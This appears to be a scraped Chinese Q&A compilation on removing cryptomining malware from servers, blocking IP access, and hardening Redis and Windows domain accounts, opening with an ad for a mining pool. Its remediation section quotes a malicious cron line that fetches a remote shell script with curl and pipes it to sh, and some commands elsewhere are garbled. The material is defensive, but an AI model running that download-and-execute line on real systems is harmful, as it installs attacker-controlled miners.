如何关闭访问挖矿服务器的访问
没有那么容易关闭,我之前一直在使用鱼池,但是鱼池不太欢迎我这种小型矿工,后来就转到哈鱼矿工,矿池的算力也不低。
使用哈鱼矿池最大的优势就是,只要你连到矿池可以使用手机APP监控矿机,每天提现,而且用户的也在一直增加,并且有在线的客服解答你的任何问题!
2. 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
3. 服务器如何禁止某IP进行访问
利用组策略里的IP安全设置可以达到楼主的要求
为了说明,我告诉一下我的设置
我的电脑IP
192.168.0.100
路由器
ip
192.168.0.1
我通过如何阻止
我和路由器之间的相互PING来演示操作过程
首先
打开组策略
进入计算机配置里面的安全设置,点里面的IP安全策略
创建新的IP策略
下一步
随便输入名称
我就用
"阻止"
然后点
下一步
激活默认响应规则打勾
下一步
验证方法选第一个
V5协议
可能会有个警告,直接确定就好了
编辑属性打勾
完成
回到原来的界面,点新建的名称
"阻止"
他会出来个属性窗口
点击添加
下一步
不指定隧道
下一步
所有网络连结
下一步
V5协议
下一步
这时候应该是个安全规则向导界面
点添加
出来IP筛选列表
点添加
下一步
源地址用我的IP地址
下一步
目标IP地址
用一个特定的IP地址,然后输入你想阻止的IP地址
我这里用192.168.0.1
下一步
协议,针对你的游戏服务器用的通讯协议,自己选择,一般都是TCP
我这里使用ICMP
下一步
编辑属性打勾
下一步
出来筛选器属性
镜像一定要打勾,这样就能屏蔽远程IP了
然后点确定
回到了IP筛选器列表,点确定
点你刚刚建立的IP筛选器,如果上面没有命名,那么她的名字应该是
新的IP筛选器列表,点上圈圈下一步,进入筛选器操作
点阻止,下一步
完成
新规则属性
不用搞,只要点确定然后点关闭
现在回到原来的组策略界面
右键点我们刚刚建立的
名称为阻止
,选择指配
这时候,它的策略已指配
变成
是了
我这边现在PING
192.168.0.1
已经显示
C:\Documents
and
Settings\Administrator>ping
192.168.0.1
Pinging
192.168.0.1
with
32
bytes
of
data:
Destination
host
unreachable.
Destination
host
unreachable.
Destination
host
unreachable.
Destination
host
unreachable.
Ping
statistics
for
192.168.0.1:
Packets:
Sent
=
4,
Received
=
0,
Lost
=
4
(100%
loss),
然后我们试试右键点击
阻止,选择
不指配
C:\Documents
and
Settings\Administrator>ping
192.168.0.1
Pinging
192.168.0.1
with
32
bytes
of
data:
Reply
from
192.168.0.1:
bytes=32
time=1ms
TTL=127
Reply
from
192.168.0.1:
bytes=32
time=1ms
TTL=127
Reply
from
192.168.0.1:
bytes=32
time=2ms
TTL=127
Reply
from
192.168.0.1:
bytes=32
time=1ms
TTL=127
Ping
statistics
for
192.168.0.1:
Packets:
Sent
=
4,
Received
=
4,
Lost
=
0
(0%
loss),
Approximate
round
trip
times
in
milli-seconds:
Minimum
=
1ms,
Maximum
=
2ms,
Average
=
1ms
很明显,策略已经成功达到我们要的效果了
打的我好累....
恩,再次提醒,上面中的那个镜像一定要选择
不然就是我不能PING通路由器
路由器能PNG通我了
镜像的作用是双向禁止
按照上面的操作,我想楼主应该能达到自己要求的效果了
不过如果对方是动态IP,以上操作就没什么用了
以上
4. windows服务器的挖矿进程怎么关闭删除
这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后,使用里面的病毒查杀功能,直接就可以查杀这种电脑病毒了
5. “关闭远程访问或限制访问的ip地址” 怎么关闭呢阿里云的服务器。这个问题如何解决的啊
登陆阿里云之后提交工单,然后让技术给个教程就可以了啊。帮助中心有教程的
6. 怎么取消去除代理服务器访问限制 急急急
代理服务器访问限制是因为你使用了代理服务器了,要想去除服务器限制就要求你把你的代理去除,而代理服务器可以在Internet设置里取消,把‘http’的代理关掉。下面分享下win10系统取消代理服务器的具体方法:
1、按下“Win+R”组合键打开运行。
7. 如何把右下角挖矿测试去除
一种是使用云安全中心自动清理,另一种是手动清除。登录到云安全中心控制台左侧栏,选择威胁检测,安全告警处理在安全告警处理列表中,找到挖矿程序,然后点处理云安全中心安全告警处理然后根据提示一步步操作即可。
去除的方法
手动清除挖矿程序护云盾以Linux服务器为例,按照以下步骤排查及处理查看挖矿进程的执行PID,命令表示该进程的PID。清除挖矿进程的执行文件,在高CPU消耗的进程中定位到挖矿进程,并杀死该进程。
检查云服务器的防火墙中是否存在挖矿程序的矿池地址,可疑通信地址和开放端口,命令iptablesLn执行以下命令清除恶意矿池地址vietcsysconfigiptables排查是否存在定时任务crontabl根据排查的结果,对可疑的定时任务文件进行清理,防止二次入侵。
8. java 如何禁止通过ip访问服务器,而只能通过域名访问如果是通过ip访问,那么跳转到相应的提示页面,谢谢
禁止通过ip访问服务器:不需要编程即可实现。
如果服务器是IIS:把默认站点设置成【跳转到相应的提示页面】即可;
同时把你的域名站,用
80端口
的指定域名即可。
具体操作是:新建域名站--》指定
端口8080
等--》到站点属性的【高级】中,添加域名和端口80的指定即可。
9. 如何阻止对服务器的非法网络访问
答1:
每一台客户机都可以访问对方的网络账户。要阻止这种事情发生,把本地管理员账户名称改为用户不知道的其它名称。这很容易做到,简单地通过组策略就可以实现。我还要修改域控制器和工作站账户。这将迫使每一个人都使用分配给他们的域用户账户。如果你要查看谁试图访问这个账户,你可以创建一个虚假的、关闭功能的管理员账户,并把这个账户用于安全登录的目的。">这听起来好像是所有这些系统都是使用同样的用户名和口令创建的。我倾向于认为他们在使用“管理员”用户名。而且,如果这个“管理员”账户在这两台计算机上都有,并且这个账户的口令是“p@ssw0rd”,每一台客户机都可以访问对方的网络账户。要阻止这种事情发生,把本地管理员账户名称改为用户不知道的其它名称。这很容易做到,简单地通过组策略就可以实现。我还要修改域控制器和工作站账户。这将迫使每一个人都使用分配给他们的域用户账户。如果你要查看谁试图访问这个账户,你可以创建一个虚假的、关闭功能的管理员账户,并把这个账户用于安全登录的目的。
答2:
我会检查域安全政策和本地安全政策。确认每一个人都加入了这个域,而且你的许可没有限制。用户必须获得批准才能访问这个域和资源。你在管理工具中能够发现大多数这些内容。删除在XP主机中的工作组PC(输入域名系统前缀并且选择“改变域名系统前缀”)。
答3:
要限制本地登录,你可以使用组策略。有一种安全设置可以在组策略中进行设置。阅读微软知识库中编号823659的文章可以了解这种设置方法。
你还可以修改NTFS(新技术文件系统)安全设置来控制最终用户访问的文件/文件夹。设置这个功能,这样只有获得批准的域的未经授权的用户能够访问你认为可以访问的内容。
如果你知道正在使用的用户名和口令是什么,修改这些用户名和口令。如果这是本地计算机管理员的账户,有许多可用的脚本能够很方便地进行这种修改。共2页。
答4:
你好像有一个像工作组一样工作的域。如果你拥有这个权限,创建一个与本地账户名称不同的域账户。然后,然后关闭用来绕过域安全措施的任何域账户(或者至少要修改口令),强制用户使用他们的域账户。你需要确认用户必须使用他们自己的域账户访问他们在服务器上需要的资源。
然而,要记住,我在推测工作站是域成员。一旦用户开始使用域账户登录,你就可以使用组和策略来管理他们。
对于记录来说,DHCP服务器是什么设备都没有关系,只要它能够提供合适的地址和你的环境选项就行。路由器对于一个单个的子网是一种合理的选择。由于路由器没有硬盘,路由器可能会比服务器更可靠。
答5:
我是这样做的。首先,进入“开始”->“程序”->“管理工具”->域控制器安全策略。然后进入安全选项。
下一步,验证如下两个项目:
网络接入:允许“每一个人”申请匿名用户--->关闭。
网络接入:不允许匿名列举存储域管理账户和共享--->打开。
选择这两个选项应该能够纠正匿名访问问题。
最后,我会验证这些用户登录使用的本地账户与你的预的账户不一样,或者是你域控制器本地的账户。如果你让他们相同的话,这些用户名可以是一样的。但是,你必须确认口令是不同的,而且用户不知道这个口令是什么。因此,如果这些用户名是相同的,域将提示用户输入口令。遗憾的是Windows仅证实用户名,不验证这种安全识别符号。按照这些步骤应该能够解决你的服务器的未经授权的访问难题。